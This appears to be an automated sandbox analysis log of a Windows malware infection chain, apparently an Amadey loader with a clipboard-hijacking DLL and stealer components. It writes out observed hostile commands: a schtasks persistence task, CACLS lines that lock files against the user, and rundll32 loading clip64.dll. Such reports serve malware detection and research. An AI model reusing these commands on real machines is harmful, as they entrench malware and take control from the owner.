Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D217.exe C:\Users\user\AppData\Local\Temp\D217.exe
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3448.exe C:\Users\user\AppData\Local\Temp\3448.exe
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe"
Source: C:\Users\user\AppData\Local\Temp\3448.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" /F
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "pdates.exe" /P "user:N"&&CACLS "pdates.exe" /P "user:R" /E&&echo Y\|CACLS "..\925e7e99c5" /P "user:N"&&CACLS "..\925e7e99c5" /P "user:R" /E&&Exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "pdates.exe" /P "user:N"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "pdates.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\925e7e99c5" /P "user:N"
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\925e7e99c5" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe"
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B29C.exe C:\Users\user\AppData\Local\Temp\B29C.exe
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Source: C:\Users\user\AppData\Local\Temp\3448.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\6F2B.exe C:\Users\user\AppData\Local\Temp\6F2B.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\D217.exe C:\Users\user\AppData\Local\Temp\D217.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\3448.exe C:\Users\user\AppData\Local\Temp\3448.exe	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Users\user\AppData\Local\Temp\B29C.exe C:\Users\user\AppData\Local\Temp\B29C.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\g6604988.exe	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\D217.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\y4910383.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3448.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3448.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN pdates.exe /TR "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe" /F	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y\|CACLS "pdates.exe" /P "user:N"&&CACLS "pdates.exe" /P "user:R" /E&&echo Y\|CACLS "..\925e7e99c5" /P "user:N"&&CACLS "..\925e7e99c5" /P "user:R" /E&&Exit	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Process created: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "pdates.exe" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "pdates.exe" /P "user:R" /E
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\925e7e99c5" /P "user:N"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cacls.exe CACLS "..\925e7e99c5" /P "user:R" /E
Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\l2956268.exe	Process created: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe "C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe"
Source: C:\Users\user\AppData\Local\Temp\B29C.exe	Process created: C:\Windows\SysWOW64\control.exe "C:\Windows\System32\control.exe" "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\user\AppData\Local\Temp\7_FJLbt.cpL",

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_00931F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		5_2_00931F90
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE1F90 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,ExitWindowsEx,		6_2_00CE1F90

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Local\Temp\6F2B.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_0093597D GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,

5_2_0093597D

Source: j8994074.exe, 0000001C.00000002.711187099.00000000042E1000.00000004.00000800.00020000.00000000.sdmp, n7660022.exe, 0000001E.00000002.698805484.0000000003A8B000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: C:\Users\user\AppData\Local\Temp\IXP003.TMP\k4215493.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\h1931339.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\j8994074.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\n7660022.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll

Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe

Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7072:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	Mutant created: \Sessions\1\BaseNamedObjects\LMR-001-
Source: C:\Users\user\AppData\Local\Temp\925e7e99c5\pdates.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5044:120:WilError_01

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Command line argument: Kernel32.dll		5_2_00932BFB
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Command line argument: Kernel32.dll		6_2_00CE2BFB

Source: ohcompetitive.exe.10.dr, Form1.cs	Cryptographic APIs: 'CreateDecryptor'
Source: ohcompettitive.exe.10.dr, Form1.cs	Cryptographic APIs: 'CreateDecryptor'

Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompettitive.exe	File read: C:\Windows\System32\drivers\etc\hosts

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\AppData\Local\Temp\IXP004.TMP\ohcompetitive.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.419758737.00007FFA13021000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: wextract.pdb source: explorer.exe, 00000001.00000003.468593749.000000000F4D3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.470742805.000000000D8C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.466088013.000000000F4D3000.00000004.00000001.00020000.00000000.sdmp, 6F2B.exe, 6F2B.exe, 00000005.00000000.466315554.0000000000931000.00000020.00000001.01000000.00000006.sdmp, 6F2B.exe, 00000005.00000003.467119503.00000000050EB000.00000004.00000020.00020000.00000000.sdmp, x5587928.exe, x5587928.exe, 00000006.00000000.467399874.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, D217.exe, 00000008.00000002.773219124.0000000001271000.00000020.00000001.01000000.0000000B.sdmp, D217.exe, 00000008.00000003.469686347.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000002.483833372.0000000000821000.00000020.00000001.01000000.0000000D.sdmp, 3448.exe, 0000000A.00000000.471189674.00007FF7F2809000.00000002.00000001.01000000.0000000E.sdmp, 3448.exe, 0000000A.00000002.908508205.00007FF7F2809000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.419758737.00007FFA13021000.00000020.00000001.01000000.00000005.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: x5587928.exe, 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, x5587928.exe, 00000006.00000003.468013227.0000000002EEC000.00000004.00000020.00020000.00000000.sdmp, g6604988.exe, 00000007.00000000.468266964.00000000011CD000.00000002.00000001.01000000.00000009.sdmp, g6604988.exe, 00000007.00000002.473143902.00000000011CD000.00000002.00000001.01000000.00000009.sdmp, g6604988.exe, 00000007.00000003.469830936.0000000003121000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000003.470768085.0000000002D8C000.00000004.00000020.00020000.00000000.sdmp, pdates.exe, 0000000C.00000000.471819849.000000000105D000.00000002.00000001.01000000.00000010.sdmp, pdates.exe, 0000000C.00000002.909152306.000000000105D000.00000002.00000001.01000000.00000010.sdmp, pdates.exe, 00000015.00000002.480535770.000000000105D000.00000002.00000001.01000000.00000010.sdmp, pdates.exe, 00000015.00000000.476466612.000000000105D000.00000002.00000001.01000000.00000010.sdmp, l2956268.exe, 00000016.00000002.482336267.0000000000B1D000.00000002.00000001.01000000.00000015.sdmp, l2956268.exe, 00000016.00000000.476913985.0000000000B1D000.00000002.00000001.01000000.00000015.sdmp, pdates.exe, 0000001D.00000000.481854440.000000000105D000.00000002.00000001.01000000.00000010.sdmp, pdates.exe, 0000001D.00000002.483424450.000000000105D000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: wextract.pdbGCTL source: explorer.exe, 00000001.00000003.468593749.000000000F4D3000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.470742805.000000000D8C1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.466088013.000000000F4D3000.00000004.00000001.00020000.00000000.sdmp, 6F2B.exe, 00000005.00000000.466315554.0000000000931000.00000020.00000001.01000000.00000006.sdmp, 6F2B.exe, 00000005.00000003.467119503.00000000050EB000.00000004.00000020.00020000.00000000.sdmp, x5587928.exe, 00000006.00000000.467399874.0000000000CE1000.00000020.00000001.01000000.00000008.sdmp, D217.exe, 00000008.00000002.773219124.0000000001271000.00000020.00000001.01000000.0000000B.sdmp, D217.exe, 00000008.00000003.469686347.0000000000E63000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000002.483833372.0000000000821000.00000020.00000001.01000000.0000000D.sdmp, 3448.exe, 0000000A.00000000.471189674.00007FF7F2809000.00000002.00000001.01000000.0000000E.sdmp, 3448.exe, 0000000A.00000002.908508205.00007FF7F2809000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxzip32\Release\sfxzip.pdb source: explorer.exe, 00000001.00000003.473525117.0000000013331000.00000004.00000010.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.488090531.000000000F393000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.473050709.000000000F4E1000.00000004.00000001.00020000.00000000.sdmp, B29C.exe, 0000001F.00000002.525796386.00000000008F9000.00000002.00000001.01000000.0000001B.sdmp, B29C.exe, 0000001F.00000000.489155993.00000000008F9000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: x5587928.exe, 00000006.00000003.467925557.0000000004C18000.00000004.00000020.00020000.00000000.sdmp, x5587928.exe, 00000006.00000003.468013227.0000000002EEC000.00000004.00000020.00020000.00000000.sdmp, y4910383.exe, 00000009.00000003.470572149.0000000004B9B000.00000004.00000020.00020000.00000000.sdmp, k4215493.exe, 0000000B.00000000.471443025.00000000001F2000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\Mktmp\Amadey\ClipperDLL\Release\CLIPPERDLL.pdb source: pdates.exe, 0000000C.00000002.908312889.0000000000AF9000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001A.00000002.908709321.000000006E80F000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: protobuf-net.pdb source: ohcompetitive.exe, 0000000D.00000002.754662860.00000000043B5000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.787895356.0000000007A60000.00000004.08000000.00040000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, ohcompetitive.exe, 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: eex.pdb source: explorer.exe, 00000001.00000000.419758737.00007FFA13021000.00000020.00000001.01000000.00000005.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 13.2.ohcompetitive.exe.4296d10.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ohcompetitive.exe.79a0000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ohcompetitive.exe.4296d10.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ohcompetitive.exe.32e5268.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ohcompetitive.exe.42bed30.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ohcompetitive.exe.32e5268.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.ohcompetitive.exe.430ed50.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.786519380.00000000079A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.726837895.0000000003314000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.726837895.000000000325B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.754662860.000000000430E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.726837895.000000000331C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.754662860.0000000004101000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.726837895.0000000003300000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: ohcompetitive.exe PID: 2552, type: MEMORYSTR

Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401C4D push FFFFFF94h; retf	0_2_00401C80
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401C03 push FFFFFF94h; retf	0_2_00401C80
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401C05 push FFFFFF94h; retf	0_2_00401C80
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401C0D push FFFFFF94h; retf	0_2_00401C80
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00402E11 push edx; retf	0_2_00402E1E
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401C20 push FFFFFF94h; retf	0_2_00401C80
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401C24 push FFFFFF94h; retf	0_2_00401C80
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_00401C3A push FFFFFF94h; retf	0_2_00401C80
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_0040170F push esi; iretd	0_2_00401738
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004029C7 push dword ptr [eax+4EB63366h]; iretd	0_2_004029E0
Source: C:\Users\user\Desktop\q4B165cujP.exe	Code function: 0_2_004023CF push ss; ret	0_2_004023D0
Source: C:\Users\user\AppData\Local\Temp\6F2B.exe	Code function: 5_2_0093724D push ecx; ret	5_2_00937260
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\x5587928.exe	Code function: 6_2_00CE724D push ecx; ret	6_2_00CE7260

Source: C:\Users\user\AppData\Local\Temp\6F2B.exe

Code function: 5_2_00932F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

5_2_00932F1D

Source: 3448.exe.1.dr

Static PE information: 0xAE1BC4F8 [Tue Jul 25 12:18:00 2062 UTC]

Source: B29C.exe.1.dr

Static PE information: section name: .didat

Source: g6604988.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x43061
Source: q4B165cujP.exe	Static PE information: real checksum: 0xf51e should be: 0x1096f
Source: h1931339.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x2c23
